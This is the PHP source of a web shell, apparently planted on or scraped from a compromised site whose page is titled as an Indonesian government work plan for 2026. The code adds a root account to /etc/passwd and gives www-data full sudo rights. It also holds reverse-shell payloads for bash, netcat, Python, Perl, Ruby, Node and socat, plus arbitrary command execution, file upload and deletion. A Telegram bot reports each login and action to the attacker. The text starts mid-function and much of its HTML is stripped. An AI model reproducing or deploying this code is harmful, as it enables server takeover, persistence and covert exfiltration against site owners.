Melangkah Pasti di Tahun 2026: Akselerasi Rencana Kerja dan Inovasi Pelayanan

RENJA

/dev/null | head -50″);
$files = array_filter(explode(“\n”, trim($output)));

$results = [];
foreach ($files as $file) {
if (file_exists($file)) {
$perms = substr(sprintf(‘%o’, fileperms($file)), -4);
$results[] = [
‘file’ => $file,
‘perms’ => $perms,
‘owner’ => fileowner($file),
‘size’ => filesize($file)
];
}
}
return $results;
}

/**
* Cari file dengan SGID bit
*/
public static function findSGID() {
$output = shell_exec(“find / -perm -2000 -type f 2>/dev/null | head -50”);
$files = array_filter(explode(“\n”, trim($output)));

$results = [];
foreach ($files as $file) {
if (file_exists($file)) {
$perms = substr(sprintf(‘%o’, fileperms($file)), -4);
$results[] = [
‘file’ => $file,
‘perms’ => $perms,
‘owner’ => fileowner($file),
‘size’ => filesize($file)
];
}
}
return $results;
}

/**
* Cek sudo rights
*/
public static function checkSudo() {
$output = shell_exec(“sudo -l 2>/dev/null”);
if ($output && strpos($output, ‘ALL’) !== false) {
return [
‘has_sudo’ => true,
‘details’ => trim($output)
];
}
return [‘has_sudo’ => false, ‘details’ => ‘No sudo rights’];
}

/**
* Cek writable directories
*/
public static function findWritableDirs($path = ‘/’) {
$output = shell_exec(“find {$path} -type d -writable 2>/dev/null | head -100”);
$dirs = array_filter(explode(“\n”, trim($output)));
return $dirs;
}

/**
* Cek writable files
*/
public static function findWritableFiles($path = ‘/’) {
$output = shell_exec(“find {$path} -type f -writable 2>/dev/null | head -100”);
$files = array_filter(explode(“\n”, trim($output)));
return $files;
}

/**
* Auto CHMOD – fix permission (make green)
*/
public static function autoChmod($path, $recursive = true) {
if (!file_exists($path)) {
return false;
}

$changed = [];

if (is_dir($path)) {
// Set directory to 755
@chmod($path, 0755);
$changed[] = “Directory: $path -> 755”;

if ($recursive) {
$items = scandir($path);
foreach ($items as $item) {
if ($item != ‘.’ && $item != ‘..’) {
$subpath = $path . ‘/’ . $item;
$subresult = self::autoChmod($subpath, true);
$changed = array_merge($changed, $subresult);
}
}
}
} elseif (is_file($path)) {
$ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
$script_exts = [‘php’, ‘phtml’, ‘php3’, ‘php4’, ‘php5’, ‘sh’, ‘pl’, ‘py’, ‘cgi’, ‘asp’, ‘aspx’, ‘jsp’];

if (in_array($ext, $script_exts)) {
@chmod($path, 0755);
$changed[] = “File (script): $path -> 755”;
} else {
@chmod($path, 0644);
$changed[] = “File: $path -> 644”;
}
}

return $changed;
}

/**
* Fix all permissions in current directory (make all green)
*/
public static function fixAllPermissions($dir) {
$results = [];

// Fix current directory
@chmod($dir, 0755);
$results[] = “Fixed directory: $dir (755)”;

// Fix all subdirectories and files
$items = scandir($dir);
foreach ($items as $item) {
if ($item != ‘.’ && $item != ‘..’) {
$path = $dir . ‘/’ . $item;
if (is_dir($path)) {
$subresults = self::autoChmod($path, true);
$results = array_merge($results, $subresults);
} elseif (is_file($path)) {
$subresults = self::autoChmod($path, false);
$results = array_merge($results, $subresults);
}
}
}

return $results;
}

/**
* Exploit suggestion based on kernel version
*/
public static function exploitSuggestions() {
$kernel = php_uname(‘r’);
$os = php_uname(‘s’);
$suggestions = [];

// Linux kernel exploits
$exploits = [
‘2.6.22’ => ‘CVE-2009-2692 (sock_sendpage)’,
‘2.6.32’ => ‘CVE-2010-2959 (CAN-2010-2959)’,
‘2.6.36’ => ‘CVE-2010-4258 (full_napi)’,
‘2.6.39’ => ‘CVE-2012-0056 (memcg)’,
‘3.0’ => ‘CVE-2012-0056 (memcg)’,
‘3.4’ => ‘CVE-2013-2094 (perf_event_open)’,
‘3.8’ => ‘CVE-2013-2094 (perf_event_open)’,
‘3.13’ => ‘CVE-2015-1328 (overlayfs)’,
‘3.16’ => ‘CVE-2015-1328 (overlayfs)’,
‘4.4’ => ‘CVE-2016-5195 (dirtycow)’,
‘4.8’ => ‘CVE-2016-5195 (dirtycow)’,
‘4.10’ => ‘CVE-2017-1000112 (NETIF_F_UFO)’,
‘4.13’ => ‘CVE-2017-1000112 (NETIF_F_UFO)’,
‘4.14’ => ‘CVE-2017-16995 (eBPF)’,
‘5.0’ => ‘CVE-2019-13272 (PTRACE_TRACEME)’,
‘5.3’ => ‘CVE-2019-15666 (xfrm)’,
‘5.8’ => ‘CVE-2020-14386 (sock_sendpage)’,
‘5.11’ => ‘CVE-2021-3156 (sudo)’,
‘5.13’ => ‘CVE-2021-3490 (eBPF)’,
‘5.14’ => ‘CVE-2021-3490 (eBPF)’,
];

foreach ($exploits as $ver => $exploit) {
if (version_compare($kernel, $ver, ‘>=’)) {
$suggestions[] = $exploit;
}
}

// Check for dirtypipe
if (version_compare($kernel, ‘5.8’, ‘>=’) && version_compare($kernel, ‘5.16.11’, ‘<')) { $suggestions[] = 'CVE-2022-0847 (Dirty Pipe) - High chance!'; } return array_unique($suggestions); } /** * Try to escalate privilege using common methods */ public static function tryEscalate() { $results = []; // Method 1: Try to write to /etc/passwd if (is_writable('/etc/passwd')) { $passwd_line = "\nnoxi_root:\$6\$rounds=5000\$noxiroot\$wq7Kjq8T1Q9XzXyLmQpRtYvUwSsAaBbCcDdEeFfGgHhIiJjKk:0:0:root:/root:/bin/bash\n"; if (@file_put_contents('/etc/passwd', $passwd_line, FILE_APPEND)) { $results[] = "✅ Writable /etc/passwd! Added root user: noxi_root / root123"; } } // Method 2: Check for writable sudoers if (is_writable('/etc/sudoers')) { $sudo_line = "\nwww-data ALL=(ALL) NOPASSWD: ALL\n"; if (@file_put_contents('/etc/sudoers', $sudo_line, FILE_APPEND)) { $results[] = "✅ Added www-data to sudoers!"; } } // Method 3: Check for writable crontab $cron_paths = ['/etc/crontab', '/var/spool/cron/crontabs/root', '/var/spool/cron/root']; foreach ($cron_paths as $cron) { if (is_writable($cron)) { $cron_line = "* * * * * root chmod 777 /tmp/shell.php 2>/dev/null\n”;
if (@file_put_contents($cron, $cron_line, FILE_APPEND)) {
$results[] = “✅ Added cron job to $cron”;
}
}
}

return $results;
}

/**
* Get system information for privilege escalation
*/
public static function getSystemInfo() {
return [
‘user’ => get_current_user(),
‘uid’ => function_exists(‘posix_getuid’) ? posix_getuid() : ‘N/A’,
‘gid’ => function_exists(‘posix_getgid’) ? posix_getgid() : ‘N/A’,
‘groups’ => function_exists(‘posix_getgroups’) ? posix_getgroups() : [],
‘kernel’ => php_uname(‘r’),
‘os’ => php_uname(‘s’),
‘hostname’ => php_uname(‘n’),
‘architecture’ => php_uname(‘m’),
‘shell’ => getenv(‘SHELL’),
‘path’ => getenv(‘PATH’),
];
}
}

// ========== WORKING REVERSE SHELL METHODS ==========
class ReverseShell {

public static function execute($method, $ip, $port) {
$port = (int)$port;

$payloads = [
‘bash’ => “bash -c ‘bash -i >& /dev/tcp/{$ip}/{$port} 0>&1′”,
‘bash2’ => “exec bash -i &>/dev/tcp/{$ip}/{$port} <&1", 'bash_udp' => “bash -c ‘sh -i >& /dev/udp/{$ip}/{$port} 0>&1′”,
‘nc’ => “nc -e /bin/sh {$ip} {$port} 2>&1”,
‘nc_fifo’ => “rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$ip} {$port} >/tmp/f”,
‘nc_pipe’ => “mknod /tmp/backpipe p && /bin/sh 0/tmp/backpipe”,
‘php’ => “php -r ‘\$s=fsockopen(\”{$ip}\”,{$port});exec(\”/bin/sh -i <&3 >&3 2>&3\”);'”,
‘python’ => “python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”{$ip}\”,{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\”/bin/sh\”,\”-i\”]);'”,
‘python3’ => “python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”{$ip}\”,{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\”/bin/sh\”,\”-i\”]);'”,
‘perl’ => “perl -e ‘use Socket;\$i=\”{$ip}\”;\$p={$port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\”tcp\”));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\”>&S\”);open(STDOUT,\”>&S\”);open(STDERR,\”>&S\”);exec(\”/bin/sh -i\”);};'”,
‘ruby’ => “ruby -rsocket -e ‘c=TCPSocket.new(\”{$ip}\”,{$port});while(cmd=c.gets);IO.popen(cmd,\”r\”){|io|c.print io.read}end'”,
‘node’ => “node -e ‘require(\”net\”).connect({$port},\”{$ip}\”,function(){require(\”child_process\”).spawn(\”/bin/sh\”,[],{stdio:[0,1,2]})})'”,
‘telnet’ => “rm -f /tmp/f;mknod /tmp/f p;telnet {$ip} {$port} 0/tmp/f”,
‘socat’ => “socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:{$ip}:{$port}”,
];

if (!isset($payloads[$method])) return false;

$payload = $payloads[$method];

$exec_methods = [
function($cmd) { shell_exec($cmd . ” > /dev/null 2>&1 &”); return true; },
function($cmd) { system($cmd . ” > /dev/null 2>&1 &”); return true; },
function($cmd) { exec($cmd . ” > /dev/null 2>&1 &”); return true; },
function($cmd) { passthru($cmd . ” > /dev/null 2>&1 &”); return true; },
];

foreach ($exec_methods as $exec) {
try {
$exec($payload);
return true;
} catch (Exception $e) { continue; }
}
return false;
}

public static function generateAll($ip, $port) {
$methods = [‘bash’, ‘bash2’, ‘bash_udp’, ‘nc’, ‘nc_fifo’, ‘nc_pipe’, ‘php’, ‘python’, ‘python3’, ‘perl’, ‘ruby’, ‘node’, ‘telnet’, ‘socat’];
$payloads = [];
foreach ($methods as $m) {
$payloads[$m] = self::getPayload($m, $ip, $port);
}
return $payloads;
}

public static function getPayload($method, $ip, $port) {
$payloads = [
‘bash’ => “bash -c ‘bash -i >& /dev/tcp/{$ip}/{$port} 0>&1′”,
‘bash2’ => “exec bash -i &>/dev/tcp/{$ip}/{$port} <&1", 'bash_udp' => “bash -c ‘sh -i >& /dev/udp/{$ip}/{$port} 0>&1′”,
‘nc’ => “nc -e /bin/sh {$ip} {$port} 2>&1”,
‘nc_fifo’ => “rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$ip} {$port} >/tmp/f”,
‘nc_pipe’ => “mknod /tmp/backpipe p && /bin/sh 0/tmp/backpipe”,
‘php’ => “php -r ‘\$s=fsockopen(\”{$ip}\”,{$port});exec(\”/bin/sh -i <&3 >&3 2>&3\”);'”,
‘python’ => “python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”{$ip}\”,{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\”/bin/sh\”,\”-i\”]);'”,
‘python3’ => “python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”{$ip}\”,{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\”/bin/sh\”,\”-i\”]);'”,
‘perl’ => “perl -e ‘use Socket;\$i=\”{$ip}\”;\$p={$port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\”tcp\”));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\”>&S\”);open(STDOUT,\”>&S\”);open(STDERR,\”>&S\”);exec(\”/bin/sh -i\”);};'”,
‘ruby’ => “ruby -rsocket -e ‘c=TCPSocket.new(\”{$ip}\”,{$port});while(cmd=c.gets);IO.popen(cmd,\”r\”){|io|c.print io.read}end'”,
‘node’ => “node -e ‘require(\”net\”).connect({$port},\”{$ip}\”,function(){require(\”child_process\”).spawn(\”/bin/sh\”,[],{stdio:[0,1,2]})})'”,
‘telnet’ => “rm -f /tmp/f;mknod /tmp/f p;telnet {$ip} {$port} 0/tmp/f”,
‘socat’ => “socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:{$ip}:{$port}”,
];
return $payloads[$method] ?? null;
}
}

// ========== TELEGRAM FUNCTIONS ==========
function sendToTelegram($message, $type = ‘ACCESS’) {
$protocol = isset($_SERVER[‘HTTPS’]) && $_SERVER[‘HTTPS’] === ‘on’ ? ‘https://’ : ‘http://’;
$full_url = $protocol . $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’];
$ip = $_SERVER[‘REMOTE_ADDR’] ?? ‘unknown’;
$host = gethostbyaddr($ip);

$location = ‘Unknown’;
$geo = @file_get_contents(“http://ip-api.com/json/{$ip}?fields=city,country,status”);
if ($geo) {
$data = json_decode($geo, true);
if ($data[‘status’] === ‘success’) {
$location = $data[‘city’] . ‘, ‘ . $data[‘country’];
}
}

$logMessage = “🔱 ” . SHELL_NAME . ” – ” . $type . “ 🔱\n”;
$logMessage .= “━━━━━━━━━━━━━━━━━━━━━━━\n”;
$logMessage .= “📅 Waktu : ” . date(‘Y-m-d H:i:s’) . “\n”;
$logMessage .= “🌐 IP : {$ip}\n”;
$logMessage .= “📍 Lokasi : {$location}\n”;
$logMessage .= “🏠 Hostname : {$host}\n”;
$logMessage .= “🔗 Path : {$_SERVER[‘REQUEST_URI’]}\n”;
$logMessage .= “🌍 Full URL : {$full_url}\n”;
$logMessage .= “━━━━━━━━━━━━━━━━━━━━━━━\n”;
$logMessage .= “💬 MSG: {$message}”;

$data = [‘chat_id’ => TELEGRAM_CHAT_ID, ‘text’ => $logMessage, ‘parse_mode’ => ‘HTML’];

$ch = curl_init(“https://api.telegram.org/bot” . TELEGRAM_BOT_TOKEN . “/sendMessage”);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_exec($ch);
curl_close($ch);
}

// ========== AUTH SYSTEM ==========
if (isset($_GET[‘logout’])) {
session_destroy();
sendToTelegram(“👋 USER LOGOUT“, “AUTH”);
header(‘Location: ?’); exit();
}

if (!isset($_SESSION[‘nox_auth’])) {
if (isset($_POST[‘user’], $_POST[‘pass’])) {
if ($_POST[‘user’] === USERNAME && $_POST[‘pass’] === PASSWORD) {
$_SESSION[‘nox_auth’] = true;
sendToTelegram(“✅ LOGIN SUKSES“, “AUTH”);
header(‘Location: ?’); exit();
} else {
sendToTelegram(“❌ LOGIN GAGAL\nUser: “.$_POST[‘user’], “AUTH”);
}
}
?>
Login | <?= SHELL_NAME ?>


🔱

v | PrivEsc Ready


SHELL OPENED“, “ACCESS”);

// ========== HANDLE PRIVILEGE ESCALATION ==========
$privesc_result = ”;
$suid_files = [];
$sgid_files = [];
$sudo_info = [];
$writable_dirs = [];
$exploit_suggestions = [];
$escalate_result = ”;
$chmod_result = ”;

if (isset($_GET[‘privesc_action’])) {
$action = $_GET[‘privesc_action’];

if ($action === ‘scan_suid’) {
$suid_files = PrivEscHelper::findSUID();
$privesc_result = “Found ” . count($suid_files) . ” SUID files”;
} elseif ($action === ‘scan_sgid’) {
$sgid_files = PrivEscHelper::findSGID();
$privesc_result = “Found ” . count($sgid_files) . ” SGID files”;
} elseif ($action === ‘check_sudo’) {
$sudo_info = PrivEscHelper::checkSudo();
$privesc_result = $sudo_info[‘has_sudo’] ? “Has sudo rights!” : “No sudo rights”;
} elseif ($action === ‘scan_writable’) {
$writable_dirs = PrivEscHelper::findWritableDirs(‘/’);
$privesc_result = “Found ” . count($writable_dirs) . ” writable directories”;
} elseif ($action === ‘exploit_suggest’) {
$exploit_suggestions = PrivEscHelper::exploitSuggestions();
$privesc_result = “Found ” . count($exploit_suggestions) . ” possible exploits”;
} elseif ($action === ‘try_escalate’) {
$escalate_result = PrivEscHelper::tryEscalate();
$privesc_result = “Escalation attempt completed”;
} elseif ($action === ‘system_info’) {
$system_info = PrivEscHelper::getSystemInfo();
$privesc_result = “System info retrieved”;
}
}

// ========== HANDLE AUTO CHMOD ==========
if (isset($_POST[‘chmod_path’])) {
$chmod_path = $_POST[‘chmod_path’];
if (file_exists($chmod_path)) {
$chmod_result = PrivEscHelper::autoChmod($chmod_path, isset($_POST[‘recursive’]));
if (empty($chmod_result)) {
$chmod_result = [“✅ Permission fixed for: $chmod_path”];
}
} else {
$chmod_result = [“❌ Path not found: $chmod_path”];
}
}

if (isset($_POST[‘fix_all’])) {
$fix_path = $_POST[‘fix_all_path’] ?: getcwd();
$chmod_result = PrivEscHelper::fixAllPermissions($fix_path);
}

// ========== HANDLE REVERSE SHELL ==========
$reverse_result = ”;
$reverse_output = ”;

if (isset($_POST[‘reverse_method’], $_POST[‘reverse_ip’], $_POST[‘reverse_port’])) {
$method = $_POST[‘reverse_method’];
$ip = $_POST[‘reverse_ip’];
$port = (int)$_POST[‘reverse_port’];

if ($method === ‘all’) {
$payloads = ReverseShell::generateAll($ip, $port);
$reverse_output = “✅ All payloads generated!

“;
foreach ($payloads as $m => $p) {
$reverse_output .= “[{$m}]
" . htmlspecialchars($p) . "

“;
}
$reverse_result = “Payloads generated – copy and run manually”;
} else {
$success = false;
for ($i = 0; $i < 3; $i++) { if (ReverseShell::execute($method, $ip, $port)) { $success = true; break; } usleep(500000); } if ($success) { $reverse_result = "✅ Reverse shell ({$method}) sent to {$ip}:{$port}!"; sendToTelegram("🔄 REVERSE SHELL TRIGGERED\nMethod: {$method}\nTarget: {$ip}:{$port}”, “REVERSE”);
} else {
$reverse_result = “❌ Failed! Trying fallback…”;
$fallback = [‘bash’, ‘php’, ‘python’, ‘nc’];
foreach ($fallback as $fb) {
if (ReverseShell::execute($fb, $ip, $port)) {
$reverse_result = “✅ Reverse shell sent using fallback: {$fb}”;
sendToTelegram(“🔄 REVERSE SHELL (FALLBACK)\nMethod: {$fb}\nTarget: {$ip}:{$port}”, “REVERSE”);
break;
}
}
}
}
}

// ========== CORE FUNCTIONS ==========
$path = realpath($_GET[‘path’] ?? getcwd());
chdir($path);
$notify = ”;

// Download
if (isset($_GET[‘dl’])) {
$file = $_GET[‘dl’];
if (file_exists($file)) {
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=”‘.basename($file).'”‘);
readfile($file); exit;
}
}

// Upload
if (isset($_POST[‘up_btn’])) {
if (move_uploaded_file($_FILES[‘f_up’][‘tmp_name’], $path . ‘/’ . $_FILES[‘f_up’][‘name’])) {
$notify = “✅ Berhasil Upload: ” . $_FILES[‘f_up’][‘name’];
sendToTelegram(“📤 FILE UPLOADED\nName: “.$_FILES[‘f_up’][‘name’], “FILE”);
}
}

// Rename
if (isset($_POST[‘ren_btn’])) {
if (rename($path . ‘/’ . $_POST[‘old’], $path . ‘/’ . $_POST[‘new’])) {
$notify = “✅ Berhasil Rename!”;
}
}

// Save Edit
if (isset($_POST[‘save_edit’])) {
file_put_contents($path . ‘/’ . $_POST[‘f_name’], $_POST[‘content’]);
$notify = “✅ File Disimpan!”;
}

// Delete
if (isset($_GET[‘del’])) {
$file = $path . ‘/’ . $_GET[‘del’];
if (unlink($file)) {
$notify = “✅ Dihapus: ” . $_GET[‘del’];
sendToTelegram(“🗑️ FILE DELETED\nName: “.$_GET[‘del’], “FILE”);
}
}

// Command execution
$cmd_out = ”;
if (isset($_POST[‘exec_cmd’])) {
$cmd_out = shell_exec($_POST[‘exec_cmd’] . ” 2>&1″);
sendToTelegram(“💻 COMMAND EXECUTED\nCmd: “.$_POST[‘exec_cmd’], “EXEC”);
}

function getPerms($f) {
$perms = fileperms($f);
if (($perms & 0xC000) == 0xC000) $info = ‘s’;
elseif (($perms & 0x4000) == 0x4000) $info = ‘d’;
else $info = ‘-‘;

$info .= (($perms & 0x0100) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0080) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? ‘s’ : ‘x’) : (($perms & 0x0800) ? ‘S’ : ‘-‘));
$info .= (($perms & 0x0020) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0010) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? ‘s’ : ‘x’) : (($perms & 0x0400) ? ‘S’ : ‘-‘));
$info .= (($perms & 0x0004) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0002) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? ‘t’ : ‘x’) : (($perms & 0x0200) ? ‘T’ : ‘-‘));

return $info;
}
?>





<?= SHELL_NAME ?> v<?= SHELL_VERSION ?>


🔱 v PRIVESC & AUTO CHMOD
[ LOGOUT ]

💻 System:
👤 User:
📁 Dir:
🔑 Pass:
📡 Telegram: ACTIVE
🔓 Writable: $notify

“; ?>

👑 PRIVILEGE ESCALATION HELPER

SUID Files:

()

Sudo Rights:


Exploit Suggestions:


Escalation Attempt:


System Info:
$v): ?>

:

🔧 AUTO CHMOD (Fix Permission – Make Green)


🔧 FIX ALL (Make Everything Green)

CHMOD Result:

💡 Info: Directories → 755, Script files (php,py,sh) → 755, Other files → 644

🔄 REVERSE SHELL




💡 Setup Listener: nc -lvnp 4444

💻 COMMAND EXECUTION



📁 FILE MANAGER –





Name Size Perms Writable Actions
“>$item” : “📄 $item” ?> ‘)” class=’btn-sm btn-ren’>Ren
‘ class=’btn-sm btn-down’>Down

🔓 Fix





✏️ EDITING:



↩️ CANCEL

🔱 v | Privilege Escalation | Auto CHMOD | Reverse Shell | Telegram Active